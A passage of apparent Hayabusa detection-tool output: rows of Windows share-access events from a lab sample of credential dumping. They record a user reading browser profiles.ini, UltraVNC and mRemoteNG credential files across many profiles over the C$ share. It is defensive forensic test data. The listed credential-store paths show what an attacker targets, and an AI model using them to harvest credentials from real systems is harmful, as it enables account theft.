0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.736 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.736 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.751 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.751 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.767 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.767 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.767 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.783 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.783 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.783 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.798 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.798 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.798 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.814 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.814 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.814 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.814 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.831 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.831 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.831 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.846 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.846 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.846 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.862 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.862 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.862 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.878 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.878 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.878 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.893 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.893 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.893 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.909 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.914 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.914 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.914 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.926 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.926 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.926 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.942 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.942 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAMFILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.942 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAMFILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.958 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.958 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.958 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.973 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.973 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.264 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.264 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.264 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.280 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.280 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.280 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.295 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.295 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 